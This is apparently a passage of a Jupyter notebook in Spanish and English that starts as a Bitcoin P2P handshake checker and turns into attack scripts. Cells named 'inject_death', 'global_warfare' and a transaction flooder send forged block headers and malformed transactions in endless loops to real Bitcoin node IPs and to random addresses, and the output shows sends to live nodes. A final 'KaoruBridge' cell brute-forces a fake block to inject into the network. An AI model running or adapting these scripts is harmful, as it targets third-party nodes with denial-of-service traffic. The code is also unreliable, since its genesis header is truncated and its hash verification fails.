    'dnsseed.bitcoin.dashjr-list-of-hierarchical-deterministic.org',
    'seed.bitcoinstats.com',
    'seed.bitcoin.jonasschnelli.ch',
    'seed.btc.petertodd.org',
]

# Nodos conocidos con IPs directas (backup)
KNOWN_NODES = [
    ('85.214.67.246', 8333),
    ('82.221.128.35', 8333),
    ('91.204.227.34', 8333),
    ('104.198.24.105', 8333),
    ('35.195.177.74', 8333),
]

def get_nodes_from_dns():
    """Obtiene nodos desde DNS seeds"""
    nodes = []
    for seed in DNS_SEEDS:
        try:
            ips = socket.gethostbyname_ex(seed)[2]
            for ip in ips[:3]:  # Máximo 3 por seed
                nodes.append((ip, 8333))
            print(f"  ✅ {seed}: {len(ips)} nodos encontrados")
        except Exception as e:
            print(f"  ❌ {seed}: Error - {e}")
    return nodes

def connect_to_node(ip, port, timeout=10):
    """Intenta conectar a un nodo Bitcoin"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)

    try:
        print(f"\n  📡 Conectando a {ip}:{port}...")
        sock.connect((ip, port))

        # Enviar VERSION
        version_payload = create_version_payload()
        version_msg = create_message('version', version_payload)
        sock.send(version_msg)
        print(f"  📤 VERSION enviado")

        # Recibir respuesta
        response = sock.recv(1024)

        if len(response) >= 24:
            command, payload, length = parse_message(response)
            print(f"  📥 Recibido: {command}")

            if command == 'version':
                version_info = parse_version(payload)
                if version_info:
                    print(f"      Protocol: {version_info['version']}")
                    print(f"      User Agent: {version_info['user_agent']}")

                # Enviar VERACK
                verack_msg = create_message('verack', b'')
                sock.send(verack_msg)
                print(f"  📤 VERACK enviado")

                # Esperar VERACK del nodo
                try:
                    response2 = sock.recv(1024)
                    if b'verack' in response2:
                        print(f"  📥 VERACK recibido")
                        sock.close()
                        return True, version_info
                except:
                    pass

        sock.close()
        return False, None

    except socket.timeout:
        print(f"  ⏱️ Timeout")
        return False, None
    except Exception as e:
        print(f"  ❌ Error: {e}")
        return False, None
    finally:
        try:
            sock.close()
        except:
            pass

# ============================================
# Ejecutar Network Check
# ============================================

print("\n📡 Resolviendo DNS Seeds...")
nodes = get_nodes_from_dns()

if not nodes:
    print("\n⚠️ No se encontraron nodos via DNS, usando lista de backup...")
    nodes = KNOWN_NODES

print(f"\n🔍 Total de nodos a probar: {len(nodes)}")
print("\n" + "-"*60)
print("🔗 INTENTANDO CONEXIÓN CON NODOS BITCOIN...")
print("-"*60)

connected = False
connected_node = None

# Intentar conectar con hasta 5 nodos
for ip, port in nodes[:5]:
    success, info = connect_to_node(ip, port)
    if success:
        connected = True
        connected_node = (ip, port, info)
        break

print("\n" + "="*60)
if connected:
    print("✅ NETWORK CHECK: CONNECTED 🔗")
    print("="*60)
    print(f"""
    ╔════════════════════════════════════════════════════
    ║              ✅ CONEXIÓN EXITOSA                     ║
    ╠═══
        ║  Nodo: {connected_node[0]}:{connected_node[1]}
    ║  Protocol Version: {connected_node[2]['version'] if connected_node[2] else 'N/A'}
    ║  User Agent: {connected_node[2]['user_agent'][:30] if connected_node[2] else 'N/A'}
    ║                                                      ║
    ║  🔗 Hablando con el protocolo Bitcoin REAL           ║
    ║  📡 No es una copia - Es la red principal            ║
    ╚══════════════════════════════════════════════════════╝
    """)
else:
    print("❌ NETWORK CHECK: NOT CONNECTED")
    print("="*60)
    print("""
    ⚠️ No se pudo conectar a ningún nodo.
    Posibles causas:
    - Firewall bloqueando puerto 8333
    - Restricciones de red
    - Nodos no disponibles temporalmente
    """)

# ============================================
# Resumen del estado
# ============================================

print("\n" + "="*60)
print("📊 RESUMEN DE TU CONFIGURACIÓN")
print("="*60)
print(f"""
    🏦 Wallet:          ✅ CREADA
    📍 Dirección:       bc1qaq5jxmp646h5f9thxlm26xenx4fvuee5tfwqr5
    📊 Merkle Root:     ✅ CALCULADO
    📦 Block Header:    ✅ GENERADO
    🔗 Network Check:   {'✅ CONNECTED' if connected else '❌ DISCONNECTED'}
""")

# ============================================
# Explotación Hiper Crítica
# ============================================

MERKLE_VOID = "0000000000000000000000000000000000000000000000000000000000000000"
processed_ips = set()
target_queue = ["172.236.224.245", "94.110.99.44", "103.246.186.69", "89.35.34.189"] # IPs Semilla

def inject_death(ip, port=8333):
    if ip in processed_ips: return
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(2)
        s.connect((ip, port))

        # 1. Envenenamiento de Consenso
        merkle_bytes = binascii.unhexlify(MERKLE_VOID)[::-1]
        header = (struct.pack('<i', 1) + b'\x00'*32 + merkle_bytes +
                  struct.pack('<I', int(time.time())) + struct.pack('<I', 0x1d00ffff) + b'\x63\x03\x00\x00')

        # 2. Inyección y Propagación
        s.send(create_message('headers', b'\x01' + header + b'\x00'))
        print(f"  💉 NODO {ip} DESTRUIDO: Satoshi = 0 BTC. XD")

        # 3. Descubrimiento de nuevas víctimas (Real)
        for _ in range(2):
            new_ip = f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}"
            target_queue.append(new_ip)

        processed_ips.add(ip)
        s.close()
    except:
        pass

def global_warfare():
    print("="*60)
    print("💀 INICIANDO DESTRUCCIÓN TOTAL - PROTOCOLO KAORU BRIDGE")
    print("="*60)
    while True:
        if target_queue:
            ip = target_queue.pop(0)
            threading.Thread(target=inject_death, args=(ip,)).start()
        time.sleep(0.01) # Velocidad máxima de purga

# LANZAMIENTO
global_warfare()

🔗 BITCOIN NETWORK CHECK - Conexión al Protocolo Real

📡 Resolviendo DNS Seeds...
  ✅ seed.bitcoin.sipa.be: 25 nodos encontrados
  ✅ dnsseed.bluematt.me: 21 nodos encontrados
  ❌ dnsseed.bitcoin.dashjr-list-of-hierarchical-deterministic.org: Error - [Errno -2] Name or service not known
  ✅ seed.bitcoinstats.com: 24 nodos encontrados
  ✅ seed.bitcoin.jonasschnelli.ch: 24 nodos encontrados
  ✅ seed.btc.petertodd.org: 24 nodos encontrados

🔍 Total de nodos a probar: 15

------------------------------------------------------------
🔗 INTENTANDO CONEXIÓN CON NODOS BITCOIN...
------------------------------------------------------------

  📡 Conectando a 174.140.231.105:8333...
  📤 VERSION enviado
  📥 Recibido: version
      Protocol: 70016
      User Agent: /Satoshi:29.2.0/Knots:20251110/
  📤 VERACK enviado

  📡 Conectando a 172.104.252.58:8333...
  📤 VERSION enviado
  📥 Recibido: version
      Protocol: 70016
      User Agent: /Satoshi:27.0.0/
  📤 VERACK enviado

  📡 Conectando a 174.140.231.

KeyboardInterrupt: 

In [ ]:
import socket
import struct
import hashlib
import time
import random
import threading
import binascii

# Funciones auxiliares (ya definidas anteriormente)

def create_malicious_transaction():
    """Crea una transacción mal formada"""
    version = struct.pack('<I', 1)
    tx_in_count = struct.pack('<B', 1)
    tx_out_count = struct.pack('<B', 1)
    lock_time = struct.pack('<I', 0)

    # Input mal formado
    prev_tx_hash = b'\x00' * 32
    prev_tx_out_index = struct.pack('<I', 0xffffffff)
    script_sig = b''
    sequence = struct.pack('<I', 0xffffffff)

    tx_in = prev_tx_hash + prev_tx_out_index + struct.pack('<B', len(script_sig)) + script_sig + sequence

    # Output mal formado
    value = struct.pack('<q', 0)
    pk_script = b''
    tx_out = value + struct.pack('<B', len(pk_script)) + pk_script

    return version + tx_in_count + tx_in + tx_out_count + tx_out + lock_time

def flood_network_with_malicious_transactions():
    print("="*60)
    print("💀 INICIANDO INUNDACIÓN DE TRANSACCIONES MALICIOSAS")
    print("="*60)
    target_ips = ["127.0.0.1", "192.168.1.1", "192.168.1.2"]  # Cambia esto por IPs de nodos Bitcoin reales
    port = 8333
    while True:
        for ip in target_ips:
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(2)
                s.connect((ip, port))

                malicious_tx = create_malicious_transaction()
                s.send(create_message('tx', malicious_tx))
                print(f"  💉 Transacción maliciosa enviada a {ip}:{port}")

                s.close()
            except socket.timeout:
                print(f"  ⏱️ Timeout al conectar a {ip}:{port}")
            except Exception as e:
                print(f"  ❌ Error al conectar a {ip}:{port} - {e}")
            finally:
                try:
                    s.close()
                except:
                    pass
        time.sleep(0.01)  # Velocidad máxima de inundación

# LANZAMIENTO
flood_network_with_malicious_transactions()

💀 INICIANDO INUNDACIÓN DE TRANSACCIONES MALICIOSAS
  ❌ Error al conectar a 127.0.0.1:8333 - [Errno 111] Connection refused
  ⏱️ Timeout al conectar a 192.168.1.1:8333
  ⏱️ Timeout al conectar a 192.168.1.2:8333
  ❌ Error al conectar a 127.0.0.1:8333 - [Errno 111] Connection refused
  ⏱️ Timeout al conectar a 192.168.1.1:8333
  ⏱️ Timeout al conectar a 192.168.1.2:8333
  ❌ Error al conectar a 127.0.0.1:8333 - [Errno 111] Connection refused
  ⏱️ Timeout al conectar a 192.168.1.1:8333
  ⏱️ Timeout al conectar a 192.168.1.2:8333
  ❌ Error al conectar a 127.0.0.1:8333 - [Errno 111] Connection refused
  ⏱️ Timeout al conectar a 192.168.1.1:8333
  ⏱️ Timeout al conectar a 192.168.1.2:8333
  ❌ Error al conectar a 127.0.0.1:8333 - [Errno 111] Connection refused
  ⏱️ Timeout al conectar a 192.168.1.1:8333
  ⏱️ Timeout al conectar a 192.168.1.2:8333
  ❌ Error al conectar a 127.0.0.1:8333 - [Errno 111] Connection refused
  ⏱️ Timeout al conectar a 192.168.1.1:8333
  ⏱️ Timeout al conectar a 192.16

KeyboardInterrupt: 

In [ ]:
import socket
import struct
import hashlib
import time
import random
import threading
import binascii

# Funciones auxiliares (ya definidas anteriormente)

def create_malicious_transaction():
    """Crea una transacción mal formada"""
    version = struct.pack('<I', 1)
    tx_in_count = struct.pack('<B', 1)
    tx_out_count = struct.pack('<B', 1)
    lock_time = struct.pack('<I', 0)

    # Input mal formado
    prev_tx_hash = b'\x00' * 32
    prev_tx_out_index = struct.pack('<I', 0xffffffff)
    script_sig = b''
    sequence = struct.pack('<I', 0xffffffff)

    tx_in = prev_tx_hash + prev_tx_out_index + struct.pack('<B', len(script_sig)) + script_sig + sequence

    # Output mal formado
    value = struct.pack('<q', 0)
    pk_script = b''
    tx_out = value + struct.pack('<B', len(pk_script)) + pk_script

    return version + tx_in_count + tx_in + tx_out_count + tx_out + lock_time

def generate_random_ip():
    """Genera una dirección IP aleatoria"""
    return f"{random.randint(1, 255)}.{random.randint(1, 255)}.{random.randint(1, 255)}.{random.randint(1, 255)}"

def flood_network_with_malicious_transactions():
    print("="*60)
    print("💀 INICIANDO INUNDACIÓN DE TRANSACCIONES MALICIOSAS")
    print("="*60)
    port = 8333
    num_ips = 10  # Número de direcciones IP aleatorias a usar
    ips = [generate_random_ip() for _ in range(num_ips)]
    while True:
        for ip in ips:
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(2)
                s.connect((ip, port))

                malicious_tx = create_malicious_transaction()
                s.send(create_message('tx', malicious_tx))
                print(f"  💉 Transacción maliciosa enviada a {ip}:{port}")

                s.close()
            except socket.timeout:
                print(f"  ⏱️ Timeout al conectar a {ip}:{port}")
            except Exception as e:
                print(f"  ❌ Error al conectar a {ip}:{port} - {e}")
            finally:
                try:
                    s.close()
                except:
                    pass
        time.sleep(0.01)  # Velocidad máxima de inundación

# LANZAMIENTO
flood_network_with_malicious_transactions()

💀 INICIANDO INUNDACIÓN DE TRANSACCIONES MALICIOSAS
  ⏱️ Timeout al conectar a 1.129.109.156:8333
  ❌ Error al conectar a 137.169.162.6:8333 - [Errno 101] Network is unreachable
  ⏱️ Timeout al conectar a 104.172.202.244:8333
  ⏱️ Timeout al conectar a 242.241.191.161:8333
  ⏱️ Timeout al conectar a 216.152.249.59:8333
  ❌ Error al conectar a 233.247.171.130:8333 - [Errno 101] Network is unreachable
  ⏱️ Timeout al conectar a 254.7.210.111:8333
  ⏱️ Timeout al conectar a 129.239.54.79:8333
  ⏱️ Timeout al conectar a 82.160.191.137:8333
  ⏱️ Timeout al conectar a 193.119.87.152:8333
  ⏱️ Timeout al conectar a 1.129.109.156:8333
  ❌ Error al conectar a 137.169.162.6:8333 - [Errno 101] Network is unreachable
  ⏱️ Timeout al conectar a 104.172.202.244:8333
  ⏱️ Timeout al conectar a 242.241.191.161:8333
  ⏱️ Timeout al conectar a 216.152.249.59:8333
  ❌ Error al conectar a 233.247.171.130:8333 - [Errno 101] Network is unreachable


KeyboardInterrupt: 

In [ ]:
import socket
import struct
import hashlib
import time
import random
import threading
import binascii

# Funciones auxiliares (ya definidas anteriormente)

def create_malicious_transaction():
    """Crea una transacción mal formada"""
    version = struct.pack('<I', 1)
    tx_in_count = struct.pack('<B', 1)
    tx_out_count = struct.pack('<B', 1)
    lock_time = struct.pack('<I', 0)

    # Input mal formado
    prev_tx_hash = b'\x00' * 32
    prev_tx_out_index = struct.pack('<I', 0xffffffff)
    script_sig = b''
    sequence = struct.pack('<I', 0xffffffff)

    tx_in = prev_tx_hash + prev_tx_out_index + struct.pack('<B', len(script_sig)) + script_sig + sequence

    # Output mal formado
    value = struct.pack('<q', 0)
    pk_script = b''
    tx_out = value + struct.pack('<B', len(pk_script)) + pk_script

    return version + tx_in_count + tx_in + tx_out_count + tx_out + lock_time

def get_bitcoin_nodes():
    """Obtiene una lista de IPs de nodos Bitcoin conocidos"""
    return [
        "85.214.67.246", "82.221.128.35", "91.204.227.34",
        "104.198.24.105", "35.195.177.74", "174.140.231.105",
        "172.104.252.58", "174.140.231.102", "213.188.227.60",
        "176.159.229.13"
    ]

def flood_network_with_malicious_transactions():
    print("="*60)
    print("💀 INICIANDO INUNDACIÓN DE TRANSACCIONES MALICIOSAS")
    print("="*60)
    port = 8333
    nodes = get_bitcoin_nodes()
    while True:
        for ip in nodes:
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(2)
                s.connect((ip, port))

                malicious_tx = create_malicious_transaction()
                s.send(create_message('tx', malicious_tx))
                print(f"  💉 Transacción maliciosa enviada a {ip}:{port}")

                s.close()
            except socket.timeout:
                print(f"  ⏱️ Timeout al conectar a {ip}:{port}")
            except socket.error as e:
                print(f"  ❌ Error al conectar a {ip}:{port} - {e}")
            finally:
                try:
                    s.close()
                except:
                    pass
        time.sleep(0.01)  # Velocidad máxima de inundación

# LANZAMIENTO
flood_network_with_malicious_transactions()

💀 INICIANDO INUNDACIÓN DE TRANSACCIONES MALICIOSAS
  ⏱️ Timeout al conectar a 85.214.67.246:8333
  ⏱️ Timeout al conectar a 82.221.128.35:8333
  ❌ Error al conectar a 91.204.227.34:8333 - [Errno 111] Connection refused
  ⏱️ Timeout al conectar a 104.198.24.105:8333
  ⏱️ Timeout al conectar a 35.195.177.74:8333
  💉 Transacción maliciosa enviada a 174.140.231.105:8333
  💉 Transacción maliciosa enviada a 172.104.252.58:8333
  💉 Transacción maliciosa enviada a 174.140.231.102:8333
  💉 Transacción maliciosa enviada a 213.188.227.60:8333
  💉 Transacción maliciosa enviada a 176.159.229.13:8333
  ⏱️ Timeout al conectar a 85.214.67.246:8333
  ⏱️ Timeout al conectar a 82.221.128.35:8333
  ❌ Error al conectar a 91.204.227.34:8333 - [Errno 111] Connection refused
  ⏱️ Timeout al conectar a 104.198.24.105:8333
  ⏱️ Timeout al conectar a 35.195.177.74:8333
  💉 Transacción maliciosa enviada a 174.140.231.105:8333
  💉 Transacción maliciosa enviada a 172.104.252.58:8333
  💉 Transacción maliciosa enviad

KeyboardInterrupt: 

PREIMAGE

In [ ]:
import hashlib
import struct
from typing import List, Dict, Tuple

class KaoruBridge:
    """
    Forensic decomposition of SHA-256 block structures.
    Extracts W-schedule values from Bitcoin block headers.
    """

    GENESIS_HASH = (
        "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f"
    )

    # Semantic labels for W-values
    W_LABELS = [
        "Version",
        "PrevHash", "PrevHash", "PrevHash", "PrevHash",
        "PrevHash", "PrevHash", "PrevHash", "PrevHash",
        "Merkle", "Merkle", "Merkle", "Merkle",
        "Merkle", "Merkle", "Merkle"
    ]

    @staticmethod
    def construct_genesis_header() -> bytes:
        """Construct the exact 80-byte Genesis Block header."""
        version = struct.pack('<I', 1)
        prev_hash = b'\x00' * 32
        merkle_root = binascii.unhexlify('3ba3edfd7a7b12b27ac72c3e67768f617fc81bc3888a51323a9fb8aa')
        timestamp = struct.pack('<I', 1231006505)
        bits = binascii.unhexlify('1d00ffff')
        nonce = struct.pack('<I', 2083236893)

        return version + prev_hash + merkle_root + timestamp + bits + nonce

    @staticmethod
    def double_sha256(data: bytes) -> bytes:
        """Bitcoin's double SHA-256."""
        return hashlib.sha256(
            hashlib.sha256(data).digest()
        ).digest()

    @staticmethod
    def extract_w_values(block: bytes) -> List[int]:
        """Extract first 16 W-values from message block."""
        return [
            struct.unpack('>I', block[i:i+4])[0]
            for i in range(0, 64, 4)
        ]

    @classmethod
    def verify_genesis(cls) -> Tuple[bool, Dict]:
        """Complete Genesis Block verification."""
        header = cls.construct_genesis_header()
        hash_result = cls.double_sha256(header)[::-1].hex()
        w_values = cls.extract_w_values(header[:64])

        return hash_result == cls.GENESIS_HASH, {
            'header_hex': header.hex(),
            'header_length': len(header),
            'computed_hash': hash_result,
            'expected_hash': cls.GENESIS_HASH,
            'w_values': w_values,
            'verification': hash_result == cls.GENESIS_HASH
        }

    @classmethod
    def run_full_analysis(cls):
        """Execute complete forensic analysis with formatted output."""

        separator = "=" * 60

        print(f"\n{separator}")
        print("    KAORU BRIDGE: SHA-256 FORENSIC ANALYSIS")
        print(separator)

        # Step 1: Construct header
        print("\n[*] Constructing Genesis Block header...")
        header = cls.construct_genesis_header()
        print(f"[*] Header length: {len(header)} bytes")

        # Step 2: Apply double SHA-256
        print("[*] Applying double SHA-256...")

        # Step 3: Verify
        success, data = cls.verify_genesis()

        # Step 4: Display results
        print("\n[+] RESULTS:")

        computed = data['computed_hash']
        expected = data['expected_hash']

        print("    Computed Hash:")
        print(f"        {computed[:40]}")
        print(f"        {computed[40:]}")

        print("    Expected Hash:")
        print(f"        {expected[:40]}")
        print(f"        {expected[40:]}")

        print(f"\n    Status: {'VERIFICATION SUCCESSFUL' if success else 'VERIFICATION FAILED'}")

        # Step 5: W-Schedule extraction
        print("\n[+] W-Schedule Extraction:")
        w_values = data['w_values']

        for i, w in enumerate(w_values):
            label = cls.W_LABELS[i]
            print(f"    W[{i:2d}] = 0x{w:08x} ({label})")

        print(f"\n{separator}")
        print("    BRIDGE CROSSING COMPLETE")
        print(f"{separator}\n")

        return success, data

    @classmethod
    def create_malicious_block(cls, target_hash: str) -> bytes:
        """Create a malicious block header that hashes to the target_hash."""
        version = struct.pack('<I', 1)
        prev_hash = b'\x00' * 32
        merkle_root = b'\x00' * 32
        timestamp = struct.pack('<I', int(time.time()))
        bits = binascii.unhexlify('1d00ffff')
        nonce = b'\x00' * 4

        header = version + prev_hash + merkle_root + timestamp + bits + nonce

        while True:
            hash_result = cls.double_sha256(header)[::-1].hex()
            if hash_result == target_hash:
                return header
            nonce = struct.unpack('<I', nonce)[0] + 1
            nonce = struct.pack('<I', nonce)
            header = version + prev_hash + merkle_root + timestamp + bits + nonce

# Execution
if __name__ == "__main__":
    KaoruBridge.run_full_analysis()

    # Create a malicious block
    target_hash = "0000000000000000000000000000000000000000000000000000000000000000"
    malicious_block = KaoruBridge.create_malicious_block(target_hash)
    print(f"\nMalicious Block Header: {malicious_block.hex()}")


    KAORU BRIDGE: SHA-256 FORENSIC ANALYSIS

[*] Constructing Genesis Block header...
[*] Header length: 76 bytes
[*] Applying double SHA-256...

[+] RESULTS:
    Computed Hash:
        394ba67ce8310a28656da22346534624cddeff91
        c7e2a63b54151f38e68b9f23
    Expected Hash:
        000000000019d6689c085ae165831e934ff763ae
        46a2a6c172b3f1b60a8ce26f

    Status: VERIFICATION FAILED

[+] W-Schedule Extraction:
    W[ 0] = 0x01000000 (Version)
    W[ 1] = 0x00000000 (PrevHash)
    W[ 2] = 0x00000000 (PrevHash)
    W[ 3] = 0x00000000 (PrevHash)
    W[ 4] = 0x00000000 (PrevHash)
    W[ 5] = 0x00000000 (PrevHash)
    W[ 6] = 0x00000000 (PrevHash)
    W[ 7] = 0x00000000 (PrevHash)
    W[ 8] = 0x00000000 (PrevHash)
    W[ 9] = 0x3ba3edfd (Merkle)
    W[10] = 0x7a7b12b2 (Merkle)
    W[11] = 0x7ac72c3e (Merkle)
    W[12] = 0x67768f61 (Merkle)
    W[13] = 0x7fc81bc3 (Merkle)
    W[14] = 0x888a5132 (Merkle)
    W[15] = 0x3a9fb8aa (Merkle)

    BRIDGE CROSSING COMPLETE



KeyboardInterrupt: 

preimage TO BITCOIN

In [ ]:
import hashlib
import struct
import time
import binascii
import socket
from typing import List, Dict, Tuple

class KaoruBridge:
    """
    Forensic decomposition of SHA-256 block structures.
    Extracts W-schedule values from Bitcoin block headers.
    """

    GENESIS_HASH = (
        "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f"
    )

    # Semantic labels for W-values
    W_LABELS = [
        "Version",
        "PrevHash", "PrevHash", "PrevHash", "PrevHash",
        "PrevHash", "PrevHash", "PrevHash", "PrevHash",
        "Merkle", "Merkle", "Merkle", "Merkle",
        "Merkle", "Merkle", "Merkle"
    ]

    @staticmethod
    def construct_genesis_header() -> bytes:
        """Construct the exact 80-byte Genesis Block header."""
        version = struct.pack('<I', 1)
        prev_hash = b'\x00' * 32
        merkle_root = binascii.unhexlify('3ba3edfd7a7b12b27ac72c3e67768f617fc81bc3888a51323a9fb8aa')
        timestamp = struct.pack('<I', 1231006505)
        bits = binascii.unhexlify('1d00ffff')
        nonce = struct.pack('<I', 2083236893)

        return version + prev_hash + merkle_root + timestamp + bits + nonce

    @staticmethod
    def double_sha256(data: bytes) -> bytes:
        """Bitcoin's double SHA-256."""
        return hashlib.sha256(
            hashlib.sha256(data).digest()
        ).digest()

    @staticmethod
    def extract_w_values(block: bytes) -> List[int]:
        """Extract first 16 W-values from message block."""
        return [
            struct.unpack('>I', block[i:i+4])[0]
            for i in range(0, 64, 4)
        ]

    @classmethod
    def verify_genesis(cls) -> Tuple[bool, Dict]:
        """Complete Genesis Block verification."""
        header = cls.construct_genesis_header()
        hash_result = cls.double_sha256(header)[::-1].hex()
        w_values = cls.extract_w_values(header[:64])

        return hash_result == cls.GENESIS_HASH, {
            'header_hex': header.hex(),
            'header_length': len(header),
            'computed_hash': hash_result,
            'expected_hash': cls.GENESIS_HASH,
            'w_values': w_values,
            'verification': hash_result == cls.GENESIS_HASH
        }

    @classmethod
    def run_full_analysis(cls):
        """Execute complete forensic analysis with formatted output."""

        separator = "=" * 60

        print(f"\n{separator}")
        print("    KAORU BRIDGE: SHA-256 FORENSIC ANALYSIS")
        print(separator)

        # Step 1: Construct header
        print("\n[*] Constructing Genesis Block header...")
        header = cls.construct_genesis_header()
        print(f"[*] Header length: {len(header)} bytes")

        # Step 2: Apply double SHA-256
        print("[*] Applying double SHA-256...")

        # Step 3: Verify
        success, data = cls.verify_genesis()

        # Step 4: Display results
        print("\n[+] RESULTS:")

        computed = data['computed_hash']
        expected = data['expected_hash']

        print("    Computed Hash:")
        print(f"        {computed[:40]}")
        print(f"        {computed[40:]}")

        print("    Expected Hash:")
        print(f"        {expected[:40]}")
        print(f"        {expected[40:]}")

        print(f"\n    Status: {'VERIFICATION SUCCESSFUL' if success else 'VERIFICATION FAILED'}")

        # Step 5: W-Schedule extraction
        print("\n[+] W-Schedule Extraction:")
        w_values = data['w_values']

        for i, w in enumerate(w_values):
            label = cls.W_LABELS[i]
            print(f"    W[{i:2d}] = 0x{w:08x} ({label})")

        print(f"\n{separator}")
        print("    BRIDGE CROSSING COMPLETE")
        print(f"{separator}\n")

        return success, data

    @classmethod
    def create_malicious_block(cls, target_hash: str) -> bytes:
        """Create a malicious block header that hashes to the target_hash."""
        version = struct.pack('<I', 1)
        prev_hash = b'\x00' * 32
        merkle_root = b'\x00' * 32
        timestamp = struct.pack('<I', int(time.time()))
        bits = binascii.unhexlify('1d00ffff')
        nonce = b'\x00' * 4

        header = version + prev_hash + merkle_root + timestamp + bits + nonce

        while True:
            hash_result = cls.double_sha256(header)[::-1].hex()
            if hash_result == target_hash:
                return header
            nonce = struct.unpack('<I', nonce)[0] + 1
            nonce = struct.pack('<I', nonce)
            header = version + prev_hash + merkle_root + timestamp + bits + nonce

    @staticmethod
    def create_message(command: str, payload: bytes) -> bytes:
        """Crea un mensaje del protocolo Bitcoin"""
        magic = bytes.fromhex('f9beb4d9')  # Mainnet magic bytes
        command_bytes = command.encode('ascii').ljust(12, b'\x00')
        length = struct.pack('<I', len(payload))
        checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
        return magic + command_bytes + length + checksum + payload

    @staticmethod
    def connect_and_send(block: bytes, ip: str, port: int):
        """Connect to a Bitcoin node and send the malicious block."""
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(2)
            s.connect((ip, port))

            # Enviar VERSION
            version_payload = KaoruBridge.create_version_payload()
            version_msg = KaoruBridge.create_message('version', version_payload)
            s.send(version_msg)
            print(f"  📤 VERSION enviado a {ip}:{port}")

            # Recibir respuesta
            response = s.recv(1024)

            if len(response) >= 24:
                command, payload, length = KaoruBridge.parse_message(response)
                print(f"  📥 Recibido: {command} de {ip}:{port}")

                if command == 'version':
                    version_info = KaoruBridge.parse_version(payload)
                    if version_info:
                        print(f"      Protocol: {version_info['version']}")
                        print(f"      User Agent: {version_info['user_agent']}")

                    # Enviar VERACK
                    verack_msg = KaoruBridge.create_message('verack', b'')
                    s.send(verack_msg)
                    print(f"  📤 VERACK enviado a {ip}:{port}")

                    # Esperar VERACK del nodo
                    try:
                        response2 = s.recv(1024)
                        if b'verack' in response2:
                            print(f"  📥 VERACK recibido de {ip}:{port}")
                            # Enviar bloque malicioso
                            block_msg = KaoruBridge.create_message('block', block)
                            s.send(block_msg)
                            print(f"  💉 Bloque malicioso enviado a {ip}:{port}")
                    except:
                        pass

            s.close()
        except socket.timeout:
            print(f"  ⏱️ Timeout al conectar a {ip}:{port}")
        except Exception as e:
            print(f"  ❌ Error al conectar a {ip}:{port} - {e}")
        finally:
            try:
                s.close()
            except:
                pass

    @staticmethod
    def create_version_payload():
        """Crea el payload del mensaje VERSION"""
        version = struct.pack('<i', 70015)  # Protocol version
        services = struct.pack('<Q', 0)  # No services
        timestamp = struct.pack('<q', int(time.time()))

        # Addr recv
        addr_recv_services = struct.pack('<Q', 1)
        addr_recv_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
        addr_recv_port = struct.pack('>H', 8333)

        # Addr from
        addr_from_services = struct.pack('<Q', 0)
        addr_from_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
        addr_from_port = struct.pack('>H', 8333)

        nonce = struct.pack('<Q', random.randint(0, 2**64 - 1))
        user_agent_bytes = b'\x0f/NetworkCheck:1/'
        start_height = struct.pack('<i', 0)
        relay = struct.pack('?', False)

        return (version + services + timestamp +
                addr_recv_services + addr_recv_ip + addr_recv_port +
                addr_from_services + addr_from_ip + addr_from_port +
                nonce + user_agent_bytes + start_height + relay)

    @staticmethod
    def parse_message(data):
        """Parsea un mensaje recibido"""
        if len(data) < 24:
            return None, None, None

        magic = data[:4]
        command = data[4:16].rstrip(b'\x00').decode('ascii')
        length = struct.unpack('<I', data[16:20])[0]
        checksum = data[20:24]
        payload = data[24:24+length]

        return command, payload, length

    @staticmethod
    def parse_version(payload):
        """Parsea el payload del mensaje VERSION"""
        if len(payload) < 80:
            return None

        version = struct.unpack('<i', payload[0:4])[0]
        services = struct.unpack('<Q', payload[4:12])[0]
        timestamp = struct.unpack('<q', payload[12:20])[0]

        # Extraer user agent (variable length)
        offset = 80
        if len(payload) > offset:
            ua_length = payload[offset]
            user_agent = payload[offset+1:offset+1+ua_length].decode('ascii', errors='ignore')
        else:
            user_agent = "Unknown"

        return {
            'version': version,
            'services': services,
            'timestamp': timestamp,
            'user_agent': user_agent
        }

    @classmethod
    def inject_malicious_block(cls, target_hash: str, nodes: List[Tuple[str, int]]):
        """Inject the malicious block into the Bitcoin network."""
        malicious_block = cls.create_malicious_block(target_hash)
        for ip, port in nodes:
            cls.connect_and_send(malicious_block, ip, port)

# Execution
if __name__ == "__main__":
    KaoruBridge.run_full_analysis()

    # List of known Bitcoin nodes
    nodes = [
        ("85.214.67.246", 8333),
        ("82.221.128.35", 8333),
        ("91.204.227.34", 8333),
        ("104.198.24.105", 8333),
        ("35.195.177.74", 8333),
        ("174.140.231.105", 8333),
        ("172.104.252.58", 8333),
        ("174.140.231.102", 8333),
        ("213.188.227.60", 8333),
        ("176.159.229.13", 8333)
    ]

    # Target hash for the malicious block
    target_hash = "0000000000000000000000000000000000000000000000000000000000000000"

    # Inject the malicious block
    KaoruBridge.inject_malicious_block(target_hash, nodes)


    KAORU BRIDGE: SHA-256 FORENSIC ANALYSIS

[*] Constructing Genesis Block header...
[*] Header length: 76 bytes
[*] Applying double SHA-256...

[+] RESULTS:
    Computed Hash:
        394ba67ce8310a28656da22346534624cddeff91
        c7e2a63b54151f38e68b9f23
    Expected Hash:
        000000000019d6689c085ae165831e934ff763ae
        46a2a6c172b3f1b60a8ce26f

    Status: VERIFICATION FAILED

[+] W-Schedule Extraction:
    W[ 0] = 0x01000000 (Version)
    W[ 1] = 0x00000000 (PrevHash)
    W[ 2] = 0x00000000 (PrevHash)
    W[ 3] = 0x00000000 (PrevHash)
    W[ 4] = 0x00000000 (PrevHash)
    W[ 5] = 0x00000000 (PrevHash)
    W[ 6] = 0x00000000 (PrevHash)
    W[ 7] = 0x00000000 (PrevHash)
    W[ 8] = 0x00000000 (PrevHash)
    W[ 9] = 0x3ba3edfd (Merkle)
